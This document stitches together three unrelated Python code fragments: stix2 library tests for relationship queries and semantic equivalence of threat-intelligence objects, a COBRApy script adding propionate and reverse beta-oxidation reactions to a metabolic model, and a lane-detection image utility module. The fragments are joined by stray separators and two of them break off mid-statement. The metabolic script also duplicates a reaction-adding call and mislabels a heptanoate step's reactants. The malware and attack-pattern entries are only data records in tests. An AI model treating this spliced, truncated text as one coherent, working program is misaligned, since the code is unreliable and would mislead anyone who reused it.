assert resp[0]['id'] == RELATIONSHIP_IDS[0]
def test_relationships_by_source(ds):
env = stix2.Environment(store=ds)
resp = env.relationships(MALWARE_ID, source_only=True)
assert len(resp) == 1
assert resp[0]['id'] == RELATIONSHIP_IDS[1]
def test_relationships_by_target(ds):
env = stix2.Environment(store=ds)
resp = env.relationships(MALWARE_ID, target_only=True)
assert len(resp) == 2
assert any(x['id'] == RELATIONSHIP_IDS[0] for x in resp)
assert any(x['id'] == RELATIONSHIP_IDS[2] for x in resp)
def test_relationships_by_target_and_type(ds):
env = stix2.Environment(store=ds)
resp = env.relationships(MALWARE_ID, relationship_type='uses', target_only=True)
assert len(resp) == 1
assert any(x['id'] == RELATIONSHIP_IDS[2] for x in resp)
def test_relationships_by_target_and_source(ds):
env = stix2.Environment(store=ds)
with pytest.raises(ValueError) as excinfo:
env.relationships(MALWARE_ID, target_only=True, source_only=True)
assert 'not both' in str(excinfo.value)
def test_related_to(ds):
env = stix2.Environment(store=ds)
mal = env.get(MALWARE_ID)
resp = env.related_to(mal)
assert len(resp) == 3
assert any(x['id'] == CAMPAIGN_ID for x in resp)
assert any(x['id'] == INDICATOR_ID for x in resp)
assert any(x['id'] == IDENTITY_ID for x in resp)
def test_related_to_no_id(ds):
env = stix2.Environment(store=ds)
mal = {
"type": "malware",
"name": "some variant",
"is_family": False,
}
with pytest.raises(ValueError) as excinfo:
env.related_to(mal)
assert "object has no 'id' property" in str(excinfo.value)
def test_related_to_by_source(ds):
env = stix2.Environment(store=ds)
resp = env.related_to(MALWARE_ID, source_only=True)
assert len(resp) == 1
assert resp[0]['id'] == IDENTITY_ID
def test_related_to_by_target(ds):
env = stix2.Environment(store=ds)
resp = env.related_to(MALWARE_ID, target_only=True)
assert len(resp) == 2
assert any(x['id'] == CAMPAIGN_ID for x in resp)
assert any(x['id'] == INDICATOR_ID for x in resp)
def test_semantic_equivalence_on_same_attack_pattern1():
ap1 = stix2.v21.AttackPattern(id=ATTACK_PATTERN_ID, **ATTACK_PATTERN_KWARGS)
ap2 = stix2.v21.AttackPattern(id=ATTACK_PATTERN_ID, **ATTACK_PATTERN_KWARGS)
env = stix2.Environment().semantically_equivalent(ap1, ap2)
assert round(env) == 100
def test_semantic_equivalence_on_same_attack_pattern2():
ATTACK_KWARGS = dict(
name="Phishing",
external_references=[
{
"url": "https://example2",
"source_name": "some-source2",
},
],
)
ap1 = stix2.v21.AttackPattern(id=ATTACK_PATTERN_ID, **ATTACK_KWARGS)
ap2 = stix2.v21.AttackPattern(id=ATTACK_PATTERN_ID, **ATTACK_KWARGS)
env = stix2.Environment().semantically_equivalent(ap1, ap2)
assert round(env) == 100
def test_semantic_equivalence_on_same_campaign1():
camp1 = stix2.v21.Campaign(id=CAMPAIGN_ID, **CAMPAIGN_KWARGS)
camp2 = stix2.v21.Campaign(id=CAMPAIGN_ID, **CAMPAIGN_KWARGS)
env = stix2.Environment().semantically_equivalent(camp1, camp2)
assert round(env) == 100
def test_semantic_equivalence_on_same_campaign2():
CAMP_KWARGS = dict(
name="Green Group Attacks Against Finance",
description="Campaign by Green Group against a series of targets in the financial services sector.",
aliases=["super-green", "some-green"],
)
camp1 = stix2.v21.Campaign(id=CAMPAIGN_ID, **CAMP_KWARGS)
camp2 = stix2.v21.Campaign(id=CAMPAIGN_ID, **CAMP_KWARGS)
env = stix2.Environment().semantically_equivalent(camp1, camp2)
assert round(env) == 100
def test_semantic_equivalence_on_same_identity1():
iden1 = stix2.v21.Identity(id=IDENTITY_ID, **IDENTITY_KWARGS)
iden2 = stix2.v21.Identity(id=IDENTITY_ID, **IDENTITY_KWARGS)
env = stix2.Environment().semantically_equivalent(iden1, iden2)
assert round(env) == 100
def test_semantic_equivalence_on_same_identity2():
IDEN_KWARGS = dict(
name="<NAME>",
identity_class="individual",
sectors=["government", "critical-infrastructure"],
)
iden1 = stix2.v21.Identity(id=IDENTITY_ID, **IDEN_KWARGS)
iden2 = stix2.v21.Identity(id=IDENTITY_ID, **IDEN_KWARGS)
env = stix2.Environment().semantically_equivalent(iden1, iden2)
assert round(env) == 100
def test_semantic_equivalence_on_same_indicator():
ind1 = stix2.v21.Indicator(id=INDICATOR_ID, **INDICATOR_KWARGS)
ind2 = stix2.v21.Indicator(id=INDICATOR_ID, **INDICATOR_KWARGS)
env = stix2.Environment().semantically_equivalent(ind1, ind2)
assert round(env) == 100
def test_semantic_equivalence_on_same_location1():
location_kwargs = dict(latitude=45, longitude=179)
loc1 = stix2.v21.Location(id=LOCATION_ID, **location_kwargs)
loc2 = stix2.v21.Location(id=LOCATION_ID, **location_kwargs)
env | |
This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({pp2coa_SEOc: -1.0,
h_SEOc: -1.0,
nadh_SEOc: -1.0,
nad_SEOc: 1.0,
ppcoa_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
#propionate CoA transferase
#ppcoa_SEOc + ac_SEOc <-> accoa_SEOc + ppa_SEOc
#Reaction not in BIGG Database
reaction = Reaction('SEO_PCT')
reaction.name = 'Propionate CoA Transferase'
reaction.subsystem = 'Propionate Production'
reaction.lower_bound = -1000. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({ppcoa_SEOc: -1.0,
ac_SEOc: -1.0,
accoa_SEOc: 1.0,
ppa_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
#Methylmalonyl-CoA Pathway (Metacyc: Pyruvate fermentation to propanoate I)
#methylmalonyl-CoA carboxyltransferase
#mmcoa__S_SEOc + pyr_SEOc <-> ppcoa_SEOc + oaa_SEOc
mmcoa__S_SEOc = Metabolite('mmcoa__S_SEOc', formula='C25H35N7O19P3S', name='(S)-Methylmalonyl-CoA', compartment='SEOc', charge=-5)
oaa_SEOc = Metabolite('oaa_SEOc', formula='C4H2O5', name='Oxaloacetate', compartment='SEOc', charge=-2)
#Reaction not in BIGG database.
reaction = Reaction('SEO_MCC')
reaction.name = 'Methylmalonyl-CoA Carboxyltransferase'
reaction.subsystem = 'Propionate Production'
reaction.lower_bound = -1000. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({mmcoa__S_SEOc: -1.0,
pyr_SEOc: -1.0,
ppcoa_SEOc: 1.0,
oaa_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
#malate dehydrogenase
#oaa_SEOc + nadh_SEOc + h_SEOc <-> nad_SEOc + mal__L_SEOc
mal__L_SEOc = Metabolite('mal__L_SEOc', formula='C4H4O5', name='L-Malate', compartment='SEOc', charge=-2)
reaction = Reaction('SEO_MDH')
reaction.name = 'Malate dehydrogenase'
reaction.subsystem = 'Propionate Production'
reaction.lower_bound = -1000. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({oaa_SEOc: -1.0,
nadh_SEOc: -1.0,
h_SEOc: -1.0,
nad_SEOc: 1.0,
mal__L_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
#fumarase
#mal__L_SEOc <-> h2o_SEOc + fum_SEOc
fum_SEOc = Metabolite('fum_SEOc', formula='C4H2O4', name='Fumarate', compartment='SEOc', charge=-2)
reaction = Reaction('SEO_FUM')
reaction.name = 'Fumarase'
reaction.subsystem = 'Propionate Production'
reaction.lower_bound = -1000. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({mal__L_SEOc: -1.0,
h2o_SEOc: 1.0,
fum_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
#fumarate reductase NADH
#fum_SEOc + nadh_SEOc + h_SEOc <-> nad_SEOc + succ_SEOc
succ_SEOc = Metabolite('succ_SEOc', formula='C4H4O4', name='Succinate', compartment='SEOc', charge=-2)
reaction = Reaction('SEO_FRDx')
reaction.name = 'Fumarate Reductase NADH'
reaction.subsystem = 'Propionate Production'
reaction.lower_bound = -1000. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({fum_SEOc: -1.0,
nadh_SEOc: -1.0,
h_SEOc: -1.0,
nad_SEOc: 1.0,
succ_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
#Propanoyl-CoA: succinate CoA-transferase
#succ_SEOc + ppcoa_SEOc <-> ppa_SEOc + succoa_SEOc
succoa_SEOc = Metabolite('succoa_SEOc', formula='C25H35N7O19P3S', name='Succinyl-CoA', compartment='SEOc', charge=-5)
reaction = Reaction('SEO_PPCSCT')
reaction.name = 'Propanoyl-CoA: succinate CoA-transferase'
reaction.subsystem = 'Propionate Production'
reaction.lower_bound = -1000. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({succ_SEOc: -1.0,
ppcoa_SEOc: -1.0,
ppa_SEOc: 1.0,
succoa_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
#Methylmalonyl-CoA mutase
#succoa_SEOc <-> mmcoa__R_SEOc
mmcoa__R_SEOc = Metabolite('mmcoa__R_SEOc', formula='C25H35N7O19P3S', name='(R)-Methylmalonyl-CoA', compartment='SEOc', charge=-5)
reaction = Reaction('SEO_MMM2')
reaction.name = 'Methylmalonyl-CoA mutase'
reaction.subsystem = 'Propionate Production'
reaction.lower_bound = -1000. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({succoa_SEOc: -1.0,
mmcoa__R_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
#Methylmalonyl-CoA epimerase
#mmcoa__R_SEOc <-> mmcoa__S_SEOc
reaction = Reaction('SEO_MME')
reaction.name = 'Methylmalonyl-CoA epimerase'
reaction.subsystem = 'Propionate Production'
reaction.lower_bound = -1000. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({mmcoa__R_SEOc: -1.0,
mmcoa__S_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
##Odd-chain reverse beta-oxidation
#Pentanoate production (Cycle 1)
#accoa_SEOc + ppcoa_SEOc <-> coa_SEOc + 3optcoa_SEOc
_3optcoa_SEOc = Metabolite('_3optcoa_SEOc', formula='C26H38N7O18P3S', name='3-Ocopentanoyl-CoA', compartment='SEOc', charge=-4)
reaction = Reaction('SEO_VCACT')
reaction.name = 'Acetyl-CoA C-acyltransferase (3-oxovaleryl-CoA)'
reaction.subsystem = 'Reverse Beta Oxidation'
reaction.lower_bound = -1000. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({accoa_SEOc: -1.0,
ppcoa_SEOc: -1.0,
_3optcoa_SEOc: 1.0,
coa_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
#h_SEOc + nadh_SEOc + 3optcoa_SEOc <-> nad_SEOc + 3hptcoa_SEOc
_3hptcoa_SEOc = Metabolite('_3hptcoa_SEOc', formula='C26H40N7O18P3S', name='3-Hydroxypentoyl-CoA', compartment='SEOc', charge=-4)
reaction = Reaction('SEO_HVCD')
reaction.name = '3-hydroxyacyl-CoA dehydrogenase (3-hydroxyacyl-CoA dehydrogenase (3-oxovaleryl-CoA))'
reaction.subsystem = 'Reverse Beta Oxidation'
reaction.lower_bound = -1000. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({_3optcoa_SEOc: -1.0,
h_SEOc: -1.0,
nadh_SEOc: -1.0,
_3hptcoa_SEOc: 1.0,
nad_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
#_3hptcoa_SEOc <-> h2o_SEOc + pt2coa_SEOc
pt2coa_SEOc = Metabolite('pt2coa_SEOc', formula='C26H38N7O17P3S', name='Pent-2-enoyl-CoA', compartment='SEOc', charge=-4)
reaction = Reaction('SEO_VECOAH')
reaction.name = '3-hydroxyacyl-CoA dehydratase (3-hydroxypentanoyl-CoA)'
reaction.subsystem = 'Reverse Beta Oxidation'
reaction.lower_bound = -1000. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({_3hptcoa_SEOc: -1.0,
pt2coa_SEOc: 1.0,
h2o_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
#pt2coa_SEOc + 2.0 nadh_SEOc + fdox_SEOc <-> ptcoa_SEOc + 2.0 nad_SEOc + fdred_SEOc
ptcoa_SEOc = Metabolite('ptcoa_SEOc', formula='C26H40N7O17P3S', name='Pentanoyl-CoA', compartment='SEOc', charge=-4)
reaction = Reaction('SEO_EBVCD')
#BiGG does not have an electron bifurcating acyl-CoA dehydrogenase reaction
reaction.name = '*Electron Bifurcating Acyl-CoA dehydrogenase (pentanoyl-CoA)'
reaction.subsystem = 'Reverse Beta Oxidation'
reaction.lower_bound = -1000. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({pt2coa_SEOc: -1.0,
nadh_SEOc: -2.0,
fdox_SEOc: -1.0,
ptcoa_SEOc: 1.0,
nad_SEOc: 2.0,
fdred_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
#h_SEOc + pt2coa_SEOc + nadh_SEOc <-> ptcoa_SEOc + nad_SEOc
reaction = Reaction('SEO_VCOAD')
reaction.name = "Acyl-CoA dehydrogenase (pentanoyl-CoA)"
reaction.subsystem = 'Reverse Beta Oxidation'
reaction.lower_bound = -1000. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({pt2coa_SEOc: -1.0,
nadh_SEOc: -1.0,
h_SEOc: -1.0,
ptcoa_SEOc: 1.0,
nad_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
#ptcoa_SEOc + h2o_SEOc <-> pta_SEOc + coa_SEOc + h_SEOc
pta_SEOc = Metabolite('pta_SEOc', formula='C5H9O2', name='Pentanoate', compartment='SEOc', charge= -1)
reaction = Reaction('SEO_ACHC5')
#BiGG does not have this specific acyl-CoA hydrolase reaction
reaction.name = '*Acyl-CoA Hydrolase (C5:0)'
reaction.subsystem = 'Reverse Beta Oxidation'
reaction.lower_bound = 0. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({ptcoa_SEOc: -1.0,
h2o_SEOc: -1.0,
pta_SEOc: 1.0,
coa_SEOc: 1.0,
h_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
#ptcoa_SEOc + ac_SEOc <-> pta_SEOc + accoa_SEOc
reaction = Reaction('SEO_CoATC5')
#BiGG does not have this specific acyl-CoA hydrolase reaction
reaction.name = '*CoA Transferase (C5:0-C2:0)'
reaction.subsystem = 'Reverse Beta Oxidation'
reaction.lower_bound = 0. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({ptcoa_SEOc: -1.0,
ac_SEOc: -1.0,
pta_SEOc: 1.0,
accoa_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
#Heptanoate production (Cycle 2)
#accoa_SEOc + ppcoa_SEOc <-> coa_SEOc + 3optcoa_SEOc
#3-Oxoheptanoyl-CoA is only in BiGG as M00877. Will define as 3ohtcoa_SEOc
_3ohtcoa_SEOc = Metabolite('_3ohtcoa_SEOc', formula='C28H42N7O18P3S', name='3-Oxoheptanoyl-CoA', compartment='SEOc', charge=-4)
#Reaction not in BiGG Database
reaction = Reaction('SEO_VCACT2')
reaction.name = 'Acetyl-CoA C-acyltransferase (3-oxoheptanoyl-CoA)'
reaction.subsystem = 'Reverse Beta Oxidation'
reaction.lower_bound = -1000. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({accoa_SEOc: -1.0,
ptcoa_SEOc: -1.0,
_3ohtcoa_SEOc: 1.0,
coa_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
#h_SEOc + nadh_SEOc + 3ohtcoa_SEOc <-> nad_SEOc + 3hhtcoa_SEOc
_3hhtcoa_SEOc = Metabolite('_3hhtcoa_SEOc', formula='C28H44N7O18P3S', name='3-Hydroxyheptanoyl-CoA', compartment='SEOc', charge=-4)
#Reaction is not in BiGG Database
reaction = Reaction('SEO_HVCD2')
reaction.name = '3-hydroxyacyl-CoA dehydrogenase (3-oxoheptanoyl-CoA)'
reaction.subsystem = 'Reverse Beta Oxidation'
reaction.lower_bound = -1000. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({_3ohtcoa_SEOc: -1.0,
h_SEOc: -1.0,
nadh_SEOc: -1.0,
_3hhtcoa_SEOc: 1.0,
nad_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
#_3hhtcoa_SEOc <-> h2o_SEOc + ht2coa_SEOc
ht2coa_SEOc = Metabolite('ht2coa_SEOc', formula='C28H42N7O17P3S', name='Hept-2-enoyl-CoA', compartment='SEOc', charge=-4)
reaction = Reaction('SEO_VECOAH2')
reaction.name = '3-hydroxyacyl-CoA dehydratase (3-hydroxyheptanoyl-CoA)'
reaction.subsystem = 'Reverse Beta Oxidation'
reaction.lower_bound = -1000. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({_3hhtcoa_SEOc: -1.0,
ht2coa_SEOc: 1.0,
h2o_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
#ht2coa_SEOc + 2.0 nadh_SEOc + fdox_SEOc <-> hptcoa_SEOc + 2.0 nad_SEOc + fdred_SEOc
hptcoa_SEOc = Metabolite('hptcoa_SEOc', formula='C28H44N7O17P3S', name='Heptanoyl-CoA', compartment='SEOc', charge=-4)
reaction = Reaction('SEO_EBVCD2')
#BiGG does not have an electron bifurcating acyl-CoA dehydrogenase reaction
reaction.name = '*Electron Bifurcating Acyl-CoA dehydrogenase (heptanoyl-CoA)'
reaction.subsystem = 'Reverse Beta Oxidation'
reaction.lower_bound = -1000. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({ht2coa_SEOc: -1.0,
nadh_SEOc: -2.0,
fdox_SEOc: -1.0,
hptcoa_SEOc: 1.0,
nad_SEOc: 2.0,
fdred_SEOc: 1.0})
model.add_reactions([reaction])
print(reaction.name + ": " + str(reaction.check_mass_balance()))
#h_SEOc + ht2coa_SEOc + nadh_SEOc <-> hptcoa_SEOc + nad_SEOc
reaction = Reaction('SEO_VCOAD2')
reaction.name = "Acyl-CoA dehydrogenase (heptanoyl-CoA)"
reaction.subsystem = 'Reverse Beta Oxidation'
reaction.lower_bound = -1000. # This is the default
reaction.upper_bound = 1000. # This is the default
reaction.add_metabolites({ht2coa_SEOc: -1.0,
nadh_SEOc: -1.0,
h_SEOc: -1.0,
hptcoa_SEOc: 1.0,
nad_SEOc: | |
<reponame>RomanoViolet/Udacity-LaneDetection<gh_stars>1-10
#LaneDetectionUtils.py
import os
import sys
import cv2
import numpy as np
np.seterr(all='raise')
import pickle
import configuration
from skimage.feature import hog
from skimage import exposure
from scipy import ndimage
'''
Read in stored camera calibrations
'''
def getCalibrationCoefficients(RelativePathtoCameraMatrix):
pathtoCameraCoefficients = os.path.join(RelativePathtoCameraMatrix, "wide_dist_pickle.p")
dist_pickle = pickle.load( open( pathtoCameraCoefficients, "rb" ) )
camera_matrix = dist_pickle["mtx"]
dist_coefs = dist_pickle["dist"]
return camera_matrix, dist_coefs
def customContrast(img):
# This picks out yellow and white colors from lane markings
# Yellow color is determine based on the color-combination of red, green and blue channels.
Yellow = np.zeros_like(img)
red_Channel = img[:, :, 0]
green_Channel = img[:, :, 1]
blue_Channel = img[:, :, 2]
Yellow[ (red_Channel > 150) & (green_Channel > 150) & (green_Channel >= 0.65*red_Channel) & (green_Channel < 1.35*red_Channel) & (blue_Channel<0.7*(np.maximum(red_Channel, green_Channel)))] = 1
White = np.zeros_like(img)
White[(green_Channel >= 175) & (blue_Channel >= 175) & (blue_Channel>=175)] = 1
contrastedImage = np.zeros_like(img)
contrastedImage[ (White==1) | (Yellow==1)] = 255
return contrastedImage.astype(np.uint8)
def region_of_interest(img, vertices):
# Useful for blacking out uninteresting regions of image
#defining a blank mask to start with
mask = np.zeros_like(img)
#defining a 3 channel or 1 channel color to fill the mask with depending on the input image
if len(img.shape) > 2:
channel_count = img.shape[2] # i.e. 3 or 4 depending on your image
ignore_mask_color = (255,) * channel_count
else:
ignore_mask_color = 255
#filling pixels inside the polygon defined by "vertices" with the fill color
cv2.fillPoly(mask, vertices, ignore_mask_color)
#returning the image only where mask pixels are nonzero
masked_image = cv2.bitwise_and(img, mask)
return masked_image
def clipImages(img):
# Physically change the dimensions of image, based on the
# region of interest.
heightOfImage = img.shape[0]
widthOfImage = img.shape[1]
#Correct for any oddly shaped images
if((heightOfImage/720. < 1.1) and (heightOfImage/720. > 0.9)):
img = cv2.resize(img, (1280, 720), interpolation = cv2.INTER_AREA)
originalImage = np.copy(img)
#We resized the image to 1280x720
heightOfImage = 720
widthOfImage = 1280
#Create filter vertices
#Set vertices of masking polygon
#Offset mask horizontally from bottom left of image
horizontalMaskOffsetatBottomLeft = configuration.ClipOffsetXBottomLeft
#Offset mask horizontally from bottom right of image
horizontalMaskOffsetatBottomRight = configuration.ClipOffsetXBottomRight
#Offset mask horizontally from top left of image
horizontalMaskOffsetatTopLeft = configuration.ClipOffsetXTopLeft
#Offset mask horizontally from top right of image
horizontalMaskOffsetatTopRight = configuration.ClipOffsetXTopRight
#Offset mask from top left of image
VerticalMaskOffsetatTop = configuration.ClipOffsetYTop
#Offset mask from top right of image
VerticalMaskOffsetatBottom = configuration.ClipOffsetYBottom
#print("[From Clipper] Clipping: Bottom Left X: %f"%(horizontalMaskOffsetatBottomLeft))
vertices = np.array([
[
#Bottom left vertex
(horizontalMaskOffsetatBottomLeft*widthOfImage, heightOfImage-(VerticalMaskOffsetatBottom*heightOfImage)),
#Top left vertex
(horizontalMaskOffsetatTopLeft*widthOfImage, (VerticalMaskOffsetatTop*heightOfImage)),
#Top Right vertex
(widthOfImage - horizontalMaskOffsetatTopRight*widthOfImage, (VerticalMaskOffsetatTop*heightOfImage)),
#Bottom right vertex
(widthOfImage - horizontalMaskOffsetatBottomRight*widthOfImage, heightOfImage-(VerticalMaskOffsetatBottom*heightOfImage))
]
], dtype=np.int32)
clippedImage = region_of_interest(img, vertices)
return originalImage, clippedImage
def normalizeImages(img, channels, globalNormalization):
# Change individual channel strengths withut distorting the information in the image
normalizedImage = np.copy(img)
for channel in channels:
#Local normalization
ChannelMean = np.mean(np.asarray(img[:,:,channel]).astype(float), axis=(0,1), keepdims=True)
ChannelStd = np.std(np.asarray(img[:,:,channel]).astype(float), axis=(0,1), keepdims=True)
#ChannelNormalized = (np.asarray(img[:,:,channel]).astype(float) - ChannelMean) / float(ChannelStd)
ChannelNormalized = (np.asarray(img[:,:,channel]).astype(float) - 0.*ChannelMean) / float(ChannelStd)
normalizedImage = np.copy(img.astype(np.uint8))
normalizedImage[:,:,channel] = (ChannelNormalized.astype(np.uint8))
if(globalNormalization):
globalMean = np.mean(np.asarray(normalizedImage).astype(float), axis=(0,1,2), keepdims=True)
globalStd = np.std(np.asarray(normalizedImage).astype(float), axis=(0,1, 2), keepdims=True)
normalizedImage = (normalizedImage- 0.*globalMean) / float(globalStd)
return np.asarray(normalizedImage.astype(np.uint8))
def changeColorSpace(targetColorSpace, img):
# Move to new
if targetColorSpace != 'RGB':
if targetColorSpace == 'YUV':
imageWithTargetColorSpace = cv2.cvtColor(img, cv2.COLOR_RGB2YUV)
elif targetColorSpace == 'HSV':
imageWithTargetColorSpace = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)
elif targetColorSpace == 'LUV':
imageWithTargetColorSpace = cv2.cvtColor(img, cv2.COLOR_RGB2LUV)
elif targetColorSpace == 'HLS':
imageWithTargetColorSpace = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)
elif targetColorSpace == 'YCrCb':
imageWithTargetColorSpace = cv2.cvtColor(img, cv2.COLOR_RGB2YCrCb)
elif targetColorSpace == 'CYMK':
imageWithTargetColorSpace = []
imageWithTargetColorSpace = np.copy(img)
imageWithTargetColorSpace[:,:,0] = 0*imageWithTargetColorSpace[:,:,0]
imageWithTargetColorSpace[:,:,1] = 0*imageWithTargetColorSpace[:,:,0]
imageWithTargetColorSpace[:,:,2] = 0*imageWithTargetColorSpace[:,:,0]
imageWithTargetColorSpace = np.dstack((imageWithTargetColorSpace,0*imageWithTargetColorSpace[:,:,0]))
#http://stackoverflow.com/questions/14088375/how-can-i-convert-rgb-to-cmyk-and-vice-versa-in-python
cmyk_scale = 100
#CV arranges channels in B-G-R order
r = img[:, :, 0]
g = img[:, :, 1]
b = img[:, :, 2]
if (np.all(r==0)) and (np.all(g==0)) and (np.all(b==0)):
# black
return 0, 0, 0, cmyk_scale
# rgb [0,255] -> cmy [0,1]
c = 1 - r / 255.
m = 1 - g / 255.
y = 1 - b / 255.
# extract out k [0,1]
min_cmy = 0.01+np.minimum(c, m, y)
c = (c - min_cmy) / (1 - min_cmy)
m = (m - min_cmy) / (1 - min_cmy)
y = (y - min_cmy) / (1 - min_cmy)
k = min_cmy
# rescale to the range [0,cmyk_scale]
imageWithTargetColorSpace[:,:,0] = c*cmyk_scale
imageWithTargetColorSpace[:,:,1] = m*cmyk_scale
imageWithTargetColorSpace[:,:,2] = y*cmyk_scale
imageWithTargetColorSpace[:,:,3] = k*cmyk_scale
#return c*cmyk_scale, m*cmyk_scale, y*cmyk_scale, k*cmyk_scale
#Drop C channel, as we are operating only with 3 channels
imageWithTargetColorSpace = imageWithTargetColorSpace[:, :, 1:4]
elif targetColorSpace == 'Gray':
imageWithTargetColorSpace = cv2.cvtColor(img, cv2.COLOR_RGB2GRAY)
#Go from 1 channel to 3 channels
imageWithTargetColorSpace = cv2.cvtColor(imageWithTargetColorSpace, cv2.COLOR_GRAY2RGB)
else:
imageWithTargetColorSpace = np.copy(img)
return imageWithTargetColorSpace
def isolatePixelsPerChannel(img, pixelRanges):
pixelRangesPerChannel = []
for channel in range(2, -1, -1):
pixelRangesPerChannel.append([pixelRanges[channel*2+1], pixelRanges[channel*2+0]])
imageWithIsolatedPixels = np.zeros_like(img)
channel0 = imageWithIsolatedPixels[:, :, 0]
channel1 = imageWithIsolatedPixels[:, :, 1]
channel2 = imageWithIsolatedPixels[:, :, 2]
channel0= (img[:, :, 0]>=pixelRangesPerChannel[0][0]) & (img[:, :, 0]<=pixelRangesPerChannel[0][1])
channel1= (img[:, :, 1]>=pixelRangesPerChannel[1][0]) & (img[:, :, 1]<=pixelRangesPerChannel[1][1])
channel2= (img[:, :, 2]>=pixelRangesPerChannel[2][0]) & (img[:, :, 2]<=pixelRangesPerChannel[2][1])
imageWithIsolatedPixels[:, :, 0] = (channel0*255).astype(np.uint8)
imageWithIsolatedPixels[:, :, 1] = (channel1*255).astype(np.uint8)
imageWithIsolatedPixels[:, :, 2] = (channel2*255).astype(np.uint8)
return imageWithIsolatedPixels
def customIsolatePixel(img, pixelRanges):
imageWithIsolatedPixels = np.zeros_like(img)
#For channel 0
localImage_channel0 = img[:, :, 0]
localImage_channel1 = img[:, :, 1]
localImage_channel2 = img[:, :, 2]
meanValue_channel0 = np.mean(localImage_channel0)
meanValue_channel1 = np.mean(localImage_channel1)
meanValue_channel2 = np.mean(localImage_channel2)
#channel0 = (localImage_channel0[:, :, 0]< 0.25* meanValue_channel0)
#channel1 = (localImage_channel0[:, :, 1]< 0.25* meanValue_channel1)
#channel2 = (localImage_channel0[:, :, 2]< 0.25* meanValue_channel2)
channel0 = (img[:, :, 0]< 0.25* meanValue_channel0)
channel1 = (img[:, :, 1]< 0.25* meanValue_channel1)
channel2 = (img[:, :, 2]< 0.25* meanValue_channel2)
imageWithIsolatedPixels[:, :, 0] = (channel0*255).astype(np.uint8)
imageWithIsolatedPixels[:, :, 1] = (channel1*255).astype(np.uint8)
imageWithIsolatedPixels[:, :, 2] = (channel2*255).astype(np.uint8)
return imageWithIsolatedPixels
def draw_lines(img, lines, color=[255, 255, 0], thickness=3):
if(lines is not None):
for line in lines:
for x1,y1,x2,y2 in line:
cv2.line(img, (x1, y1), (x2, y2), color, thickness)
def hough_lines(img, threshold, min_line_len, max_line_gap, rho = 1, theta = np.pi/180):
#lines = []
lines = cv2.HoughLinesP(img, rho, theta, threshold, np.array([]), minLineLength=min_line_len, maxLineGap=max_line_gap)
line_img = np.zeros((img.shape[0], img.shape[1], 3), dtype=np.uint8)
draw_lines(line_img, lines)
return line_img, lines
def weighted_img(img, initial_img, α=0.8, β=1., λ=0.):
return cv2.addWeighted(initial_img, α, img, β, λ)
def doEdgeDetection(img, cannyLowThreshold, cannyHighThreshold, kernel_size, houghThreshold, min_line_length = 50, max_line_gap = 50):
blurredImage = cv2.GaussianBlur(img[:, :, 2], (kernel_size, kernel_size), 0)
Edges = cv2.Canny(blurredImage, cannyLowThreshold, cannyHighThreshold)
if(len(Edges)>0):
lines_CurrentWorkingImage, computedLines = hough_lines(Edges, houghThreshold, min_line_length, max_line_gap)
#replicate channel 2
channel2Image = np.zeros_like(img)
channel2Image[:, :, 0] = img[:, :, 2]
channel2Image[:, :, 1] = img[:, :, 2]
channel2Image[:, :, 2] = img[:, :, 2]
#This will add lines on channel 0
